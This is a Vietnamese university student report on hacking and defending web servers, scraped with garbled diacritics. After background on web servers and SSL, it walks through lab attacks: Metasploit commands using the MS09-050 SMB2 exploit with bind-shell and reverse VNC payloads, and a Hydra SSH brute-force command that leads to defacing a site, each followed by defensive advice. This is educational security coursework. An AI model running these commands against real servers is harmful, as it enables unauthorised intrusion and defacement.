Đang tải... (xem toàn văn)
1: Tổng quan về Web Server 3 1. Giới thiệu về Website. 3 2. Khái niệm Web Server. 5 a. Các loại web server thông dụng. 6 b. Giao thức SSL. 9 Chương 2: Một số cách thức tấn công và phòng chống Hacking Web Server 12 1. Tấn công Directory Traversal. 12 2. Tấn công HTTP Response Splitting. 12 3. Tấn công Web Cache Poisoning. 13 3.1. Poisoning the reverse proxy. 13 3.2. Poisoning the cache server. 13 3.3. Poisoning the cache browser. 13 4. Tấn công SSH Bruteforce. 13 5. Tấn công Manin theMiddle. 14 6. Một số cách phòng chống tấn công máy chủ Web. 14 6.1. Các biện pháp phản công. 14 6.2. Làm thế nào để bảo vệ máy chủ Web chống lại các cuộc tấn công. 16 Chương 3: Một số công cụ tấn công và phòng chống Hacking Web Server 17 1. Công cụ tấn công Web Server. 17 1.1. Metasploit Framework. 17 1.2. Wfetch. 18 1.3. Brutus. 19 2. Công cụ phòng chống tấn công Web Server. 19 2.1. Quản lý Patch:
ĐẠI HỌC QUỐC GIA TP.HỒ CHÍ MINH TRƯỜNG ĐẠI HỌC CƠNG NGHỆ THƠNG TIN KHOA MẠNG MÁY TÍNH VÀ TRUYỀN THÔNG BÁO CÁO ĐỒ ÁN TẤN CÔNG MẠNG HACKING WEB SERVER Giảng viên hướng dẫn: ThS Nguyễn Duy Các thành viên nhóm: Nguyễn Thanh Tâm 12520909 Đặng Thái Hồ 12520596 Tiếu Hoài Nam Nguyễn Văn Nhân Tháng 11/2016 12520644 12520883 MỤC LỤC LỜI MỞ ĐẦU Hiện nay, công nghệ thông tin áp dụng rộng rãi toàn cầu, phục vụ nhiều nhu cầu cho người như: kinh doanh, quản lý, mua sắm, đọc tint tức, giải trí Một dịch vụ cơng nghệ hàng đầu sử dụng phổ biến dịch vụ WEB Với cơng nghệ WEB đáp ứng nhu cầu người Bên cạnh đó, nguy bị xâm hại, đánh cắp, phá hoại thông tin, liệu cá nhân, điều khó tránh khỏi, mà dịch vụ Web nhiều lỗ hỏng bảo mật mà Trong đề tài môn “Tấn công mạng này” nhóm trình bày số thủ thuật số mẹo mà Hacker lừa Victim để lấy tài khoản lỗ hổng bảo mật WEB SERVER 2|Page Chương 1: Tổng quan Web Server Giới thiệu Website Website “trang web” lưu trữ máy chủ hay hosting hoạt động Internet Đây nơi giới thiệu thơng tin, hình ảnh doanh nghiệp, sản phần dịch vụ doanh nghiệp hay giới thiệu kì thơng tin để khách hàng truy cập đâu, lúc Website tập hợp nhiều web page Khi doanh nghiệp, công ty xây dựng website nghĩa xây dựng nhiều trang thông tin sản phẩm, dịch vụ hay giới thiệu, Để tạo nên website cần có yếu tố sau: Tên miền (domain) Thực chất website không cần đến tên miền hoạt động bình thường có địa IP trang web đấy, cần gõ vào trình duyệt IP trang web trình duyệt load trang web trình duyệt bạn Sỡ dĩ cần phải có tên miền thay cho IP IP chuỗi số thập phân, có địa IP dễ nhớ đa số địa IP khó nhớ Với tên gần gũi với ngơn ngữ tự nhiên người nên dễ nhớ mà người ta thay tên miền cho IP từ cơng nghệ DNS đời Ví dụ đơn giản để hiểu thêm tính tên miền: Trong danh bạ điện thoại lưu số điện thoại mà không gán với tên chắn điều 3|Page nhớ hết số điện thoại người biết số điện thoại lưu số với tên sau cần gọi cho người tìm danh bạ dễ dàng Nơi lưu trữ website (hosting) Nơi lưu trữ website bắt buộc phải có, máy chủ để lưu trữ hay hosting thuê từ nhà cung cấp dịch vụ Nội dung trang thông tin (web page) Nội dung trang thông tin phải có mục đích lập nên website nhằm đăng thông tin lên website hay giới thiệu thông tin cơng ty Nói đến website người ta thường nói website web động hay tĩnh, đa số website đến website động Website tĩnh hiểu người dùng gửi yêu cầu tài nguyên máy chủ trả tài ngun Các trang Web khơng khác văn định dạng phân tán Lúc đầu phát triển website web tĩnh sử dụng nhiều lúc nhu cầu việc đăng tải website chưa cao đăng thông tin kiện, địa hay lịch làm việc qua Internet mà thơi, chưa có tương tác qua trang Web Website động thuật ngữ dùng để website hỗ trợ phần mềm sở web, nói cho dễ hiểu web động web có sở liệu Ngày nay, đa số trang web có sở liệu mục đích, nhu cầu người ngày gia tăng Thực chất, website động có nghĩa website tĩnh "ghép" với phần mềm web (các modules ứng dụng cho Web) Với chương trình phần mềm này, người chủ website thực có quyền điều hành nó, chỉnh sửa cập nhật thơng tin website mà khơng cần phải nhờ đến người chuyên nghiệp Trước đây, năm 1995 đến 2004 sử dụng cơng nghệ web 1.0 với cơng nghệ đọc nội dung trang web mà người dùng khơng thể chỉnh sửa, bình luận hay nói cách khác website lúc bất hoạt động chiều mà Hiện nay, phát triển công nghệ web 2.0 hoạt động hai chiều có nghĩa người dùng chỉnh sửa, bình luận hay xóa nội dung trang web Trên đà phát triển người ta tiếp tục nghiên cứu phát triển web 3.0 hướng hẹn nhiều điều thú vị phía trước Khái niệm Web Server Web Server (máy phục vụ Web): máy tính mà cài đặt phần mềm phục vụ Web, người ta gọi phần mềm Web Server.Tất Web Server hiểu chạy file *.htm *.html, nhiên Web Server lại phục vụ số kiểu file chuyên biệt chẳng hạn 4|Page IIS Microsoft dành cho *.asp, *.aspx ; Apache dành cho *.php ; Sun Java System Web Server SUN dành cho *.jsp… Web Server máy chủ có dung lượng lớn, tốc độ cao, dùng để lưu trữ thông tin ngân hàng liệu, chứa website thiết kế với thông tin liên quan khác (các mã Script, chương trình, file Multimedia) Web Server có khả gửi đến máy khách trang Web thông qua môi trường Internet (hoặc Intranet) qua giao thức HTTP - giao thức thiết kế để gửi file đến trình duyệt Web (Web Browser), giao thức khác Tất Web Server có địa IP (IP Address) có Domain Name Giả sử bạn đánh vào Address trình duyệt bạn dòng http://www.abc.com sau gõ phím Enter bạn gửi yêu cầu đến Server có Domain Name www.abc.com Server tìm trang Web có tên index.htm gửi đến trình duyệt bạn Bất kỳ máy tính trở thành Web Server việc cài đặt lên chương trình phần mềm Server Software sau kết nối vào Internet Khi máy tính bạn kết nối đến Web Server gửi đến yêu cầu truy cập thông tin từ trang Web đó, Web Server Software nhận yêu cầu gửi lại cho bạn thông tin mà bạn mong muốn Giống phần mềm khác mà bạn cài đặt máy tính mình, Web Server Software ứng dụng phần mềm Nó cài đặt, chạy máy tính dùng làm Web Server, nhờ có chương trình mà người sử dụng truy cập đến thơng tin trang Web từ máy tính khác mạng (Internet, Intranet) Web Server Software tích hợp với CSDL (Database), hay điều khiển việc kết nối vào CSDL để truy cập kết xuất thông tin từ CSDL lên trang Web truyền tải chúng đến người dùng Server phải hoạt động liên tục 24/24 giờ, ngày tuần 365 ngày năm, để phục vụ cho việc cung cấp thông tin trực tuyến Vị trí đặt server đóng vai trò quan trọng chất lượng tốc độ lưu chuyển thơng tin từ server máy tính truy cập 5|Page Hình Thị phần Web Server a Các loại web server thơng dụng Có nhiều sản phẩm web server khác nhau, việc lựa chọn web server phù hợp dựa tiêu chí đánh giá: Khả làm việc với hệ điều hành ứng dụng khác, khả thiết lập chương trình ứng dụng phía server, khả bảo mật liệu, khả xuất trang web, công cụ hỗ trợ xây dựng trang web.Hiện có loại web server thông dụng : Internet Information Services (IIS), Apache Web Server.Trong , Apache Web Server chiếm giữ 60% thị trường web giới 6|Page i Internet Information Services (IIS) IIS dịch vụ thông tin Internet Microsoft phát triển, sản phẩm tích hợp với hệ điều hành Windows Phiên IIS 7.5 chạy hệ điều hành Windows server 2008 (hay windows 7) Trong IIS bao gồm nhiều dịch vụ dịch vụ như: dịch vụ Web Server, dịch vụ FTP Server … Ở ta đề cập đến dịch vụ Web Server IIS Web Server (gọi tắt IIS) đáp ứng yêu cầu chủ yếu Web Server như: độ tin cậy, hiệu năng, khả theo dõi giám sát (quản trị), tính bảo mật tính khả thi việc phát triển dịch vụ ứng dụng Tất cải tiến kết kết hợp chặt chẽ với tính cung cấp hệ điều hành Windows ii Apache Web Server Apache Web Server xem nỗ lực lớn việc phát triển trì Web Server mã nguồn mở cho hệ điều hành, bao gồm Unix, Linux Windows NT Đây Web Server hội tụ tất tính năng: bảo mật, hiệu suất, mở rộng phát triển cung cấp dịch vụ Web đồng chuẩn Web hành 7|Page Hình Apache Web Server Các đặc điểm bật Apache: - Ngày Apache chạy kết hợp (hybrid) chế độ đa sử lý chế độ đa lệnh - Hỗ trợ nhiều giao thức: Apache phát triển để phục vụ nhiều giao thức khác - Ngày hỗ trợ tốt cho hệ điều hành khác BeOS,OS/2vàWindows - Ngày phát triển hoàn thiện API (Application Program Interface) - Hỗ trợ IPv6 - Hỗ trợ nhiều modul dùng để lọc (Filtering) dòng liệu đến từ server - Hỗ trợ nhiều ngôn ngữ hiển thị thông báo lỗi - Ngày đơn giản dễ dàng thiết lập tham số cho Web Server qua file cấu hình 8|Page b Giao thức SSL i SSL gì? Việc kết nối Web browser tới điểm mạng Internet qua nhiều hệ thống độc lập mà khơng có bảo vệ với thông tin đường truyền Không kể người sử dụng lẫn Web server có kiểm sốt đường liệu hay kiểm sốt liệu có thâm nhập vào thơng tin đường truyền Để bảo vệ thông tin mật mạng Internet hay mạng TCP/IP nào, SSL kết hợp yếu tố sau để thiết lập giao dịch an toàn: Xác thực: Đảm bảo tính xác thực trang mà bạn làm việc đầu kết nối Cũng vậy, trang Web cần phải kiểm tra tính xác thực người sử dụng Mã hố: Đảm bảo thơng tin bị truy cập đối tượng thứ ba Để loại trừ việc nghe trộm thông tin “nhạy cảm” truyền qua Internet, liệu phải mã hố để khơng thể bị đọc người khác người gửi người nhận Tồn vẹn liệu: Đảm bảo thơng tin khơng bị sai lệch phải thể xác thông tin gốc gửi đến Với việc sử dụng SSL, Web site cung cấp khả bảo mật thơng tin, xác thực tồn vẹn liệu đến người dùng SSL tích hợp sẵn vào browser Web server, cho phép người sử dụng làm việc với trang Web chế độ an toàn Khi Web browser sử dụng kết nối SSL tới server, biểu tượng ổ khóa xuất trạng thái cửa sổ browser dòng “http” hộp nhập địa URL đổi thành “https” Một phiên giao dịch HTTPS sử dụng cổng 443 thay sử dụng cổng 80 dùng cho HTTP 9|Page ii Giao thức SSL Được phát triển Netscape, ngày giao thức Secure Socket Layer (SSL) sử dụng rộng rãi World Wide Web việc xác thực mã hố thơng tin client server Tổ chức IETF (Internet Engineering Task Force ) chuẩn hoá SSL đặt lại tên TLS (Transport Layer Security) Mặc dù có thay đổi tên TSL phiên SSL Phiên TSL 1.0 tương đương với phiên SSL 3.1 Tuy nhiên SSL thuật ngữ sử dụng rộng rãi Hình Cấu trúc SSL giao thức SSL SSL thiết kế giao thức riêng cho vấn đề bảo mật hỗ trợ cho nhiều ứng dụng Giao thức SSL hoạt động bên TCP/IP bên giao thức ứng dụng tầng cao HTTP (Hyper Text Transport Protocol), IMAP ( Internet Messaging Access Protocol) FTP (File Transport Protocol) Trong SSL sử dụng để hỗ trợ giao dịch an toàn cho nhiều ứng dụng khác Internet, SSL sử dụng cho giao dịch Web SSL giao thức đơn lẻ, mà tập thủ tục chuẩn hoá để thực nhiệm vụ bảo mật sau: Xác thực server: Cho phép người sử dụng xác thực server muốn kết nối Lúc này, phía browser sử dụng kỹ thuật mã hố cơng khai để chắn certificate public ID server có giá trị cấp phát CA (certificate authority) danh sách CA đáng tin cậy client Điều quan trọng người dùng Ví dụ gửi mã số credit card qua mạng người dùng thực muốn kiểm tra liệu server nhận thơng tin có server mà họ định gửi đến không Xác thực Client: 10 | P a g e Mở Metasploit Kali Linux dòng lệnh msfconsole Đầu tiên ta chọn exploit, dùng lệnh “show exploits” để tất exploit mà metasploit framework có hỗ trợ Ở ta chọn exploit windows/smb/ms09_050_smb2_negotiate_func_index Ta xem thơng tin exploit lệnh “info name_exploit” 21 | P a g e Tiếp theo, để sử dụng exploit ta dùng câu lệnh “use name_exploit” Trong tham số name_exploit tên exploit Sau dùng lệnh “show options” để xem cấu hình exploit mà ta sử dụng 22 | P a g e Ta tiến hành thiết đặt giá trị thiếu phần cấu hình Ở ta thiết lập địa nạn nhân vào mục RHOST Xem lại phần cấu hình 23 | P a g e Tiếp theo ta tiến hành chọn payload, dùng lệnh “show payloads” để xem payload mà chương trình hỗ trợ Ở ta dùng payload windows/shell_bind_tcp Để chọn payload ta dùng lệnh “set payload name_payload” name_payload tên phần payload 24 | P a g e Ta xem phần cấu hình payload lệnh “show options” Sau thực tất thiết lập xong, ta dùng lệnh exploit để chương trình tiến hành chèn payload vào máy nạn nhân 25 | P a g e Kết ta truy cập vào Web Server giao diện dòng lệnh c Cách phòng chống: Cập nhật vá lỗi MS90-050 cho Windows Server 2008 Sử Dụng Metasploit Điều Khiển Từ Xa Web Server a Kịch công: Dựa vào lỗi MS90-050 Windows Server 2008, attacker sử dụng công cụ Metasploit Kali Linux để truy cập từ xa vào server chiếm quyền điều khiển Web Server từ xa b Cách thức công: Mở Metasploit Kali Linux dòng lệnh msfconsole Dùng exploit windows/smb/ms09_050_smb2_negotiate_func_index lệnh: use windows/smb/ms09_050_smb2_negotiate_func_index 26 | P a g e Thiết đặt giá trị RHOST IP Web Server, thực lệnh: set RHOST [IP Web Server] Ở ta dùng payload windows/vncinject/reverse_tcp lệnh: set payload windows/vncinject/reverse_tcp 27 | P a g e Tiếp theo ta thiết đặt giá trị LHOST cho payload, IP attacker (máy chạy Kali) Cuối ta dùng lệnh exploit để thực thi 28 | P a g e Kết ta chiếm quyền điều khiển từ xa Web Server c Cách phòng chống: Cập nhật vá lỗi MS90-050 cho Windows Server 2008 29 | P a g e Tấn Công Web Server Bằng Phương Pháp Brute Force Với Công Cụ Hydra a Kịch cơng: Victim Web Server có sử dụng giao thức SSH để truy cập vào server Attacker sử dụng công cụ Hydra Kali Linux với list username list password chuẩn bị trước, tiến hành brute force vào Web Server Sau brute force thành cơng, attacker dùng username password vừa tìm truy cập vào Web Server thông qua SSH chiếm quyền điều khiển Web Server qua dòng lệnh b Cách thức công: Mở công cụ Hydra Kali Linux dòng lệnh hydra 30 | P a g e Tiếp theo ta tiến hành brute force SSH theo câu lệnh: hydra –L [list username] –P [list password] [IP victim] ssh Quá trình brute force thực hiện, tìm thấy Username Password Web Server công cụ hydra lên thông báo Ở ta tìm username Administrator password thaihoa411 31 | P a g e Ta tiến hành truy cập Web Server thông qua SSH: Kết truy cập thành công, ta thử truy xuất đến thư mục chứa website tiến hành chỉnh sửa file index trang web Giao diện trang web ban đầu: 32 | P a g e Truy xuất đến thư mục trang web, sử dụng lệnh nano để sửa file index.html 33 | P a g e Giao diện website sau chỉnh sửa: c Cách phòng chống: - Khơng nên đặt username password giao thức SSH theo mặc định admin, Administrator, password123, … - Nên đặt password có chứa kí tự in hoa, chữ số, kí tự đặc biệt - Thay đổi password thường xuyên - Đổi port cho giao thức SSH 34 | P a g e Tài liệu tham khảo [1] CEH toàn tập tiếng việt VSIC biên soạn [2] Hacking Exposed, Stuart McClure, Joel Scambray, George Kurtz [3] Slide tiếng anh CEH toàn tập http://ceh.vn http://hvaonline.net http://tailieu.vn 35 | P a g e ... xa Web Server c Cách phòng chống: Cập nhật vá lỗi MS90-050 cho Windows Server 2008 29 | P a g e Tấn Công Web Server Bằng Phương Pháp Brute Force Với Công Cụ Hydra a Kịch công: Victim Web Server. .. ban lưu trữ nhiều ứng dụng Web Chương 3: Một số công cụ công phòng chống Hacking Web Server Cơng cụ cơng Web Server 1.1 Metasploit Framework Metasploit Framework công cụ kiểm tra xâm nhập,... tài môn Tấn công mạng này” nhóm trình bày số thủ thuật số mẹo mà Hacker lừa Victim để lấy tài khoản lỗ hổng bảo mật WEB SERVER 2|Page Chương 1: Tổng quan Web Server Giới thiệu Website Website